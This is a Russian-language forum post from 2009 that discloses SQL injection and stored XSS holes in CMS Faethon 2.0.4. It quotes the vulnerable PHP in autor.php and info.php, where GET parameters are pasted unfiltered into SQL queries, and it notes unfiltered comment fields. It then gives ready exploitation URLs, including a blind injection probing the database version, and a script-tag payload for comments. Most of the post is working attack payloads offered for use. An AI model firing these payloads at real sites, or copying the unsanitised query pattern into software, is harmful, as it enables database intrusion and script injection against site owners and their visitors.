
09.11.2009, 12:03
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме: 2083691
Репутация:
330
|
|
CMS Faethon v 2.0.4 SQL injection && Active XSS
Вreetz: Red_red1 && ElteRUS
Скрипт autor.php
Уязвимый код:
PHP код:
...
elseif(isset($_GET['name']))
{
$result=sql_query("SELECT id, name FROM ".$SQL_PREFIX."_authors WHERE item = '" . $_GET['name'] . "';");
}
...
Передаваемый GET'ом параметр name не фильтруеться.
Эксплатация:
Код:
http://localhost/bug/author.php?name=vasua'/**/and/**/substring(version(),1,1)=5/**/and/**/'1'='1
скритп info.php
PHP код:
$result=sql_query("SELECT title, text FROM ".$SQL_PREFIX."_html_sections WHERE address = '" . $_GET['item'] . "';");
Эксплатация:
Код:
http://localhost/bug/info.php?item=-1'[SQL]
XSS:
Уязвимый код:
PHP код:
...
$author = $_POST['author'];
$email = $_POST['email'];
$web = $_POST['web'];
$subject = $_POST['subject'];
...
Эксплатация:
В комментах:
Код:
"><script>alert()</script>
Последний раз редактировалось Ins3t; 09.11.2009 в 17:47..
|
|
|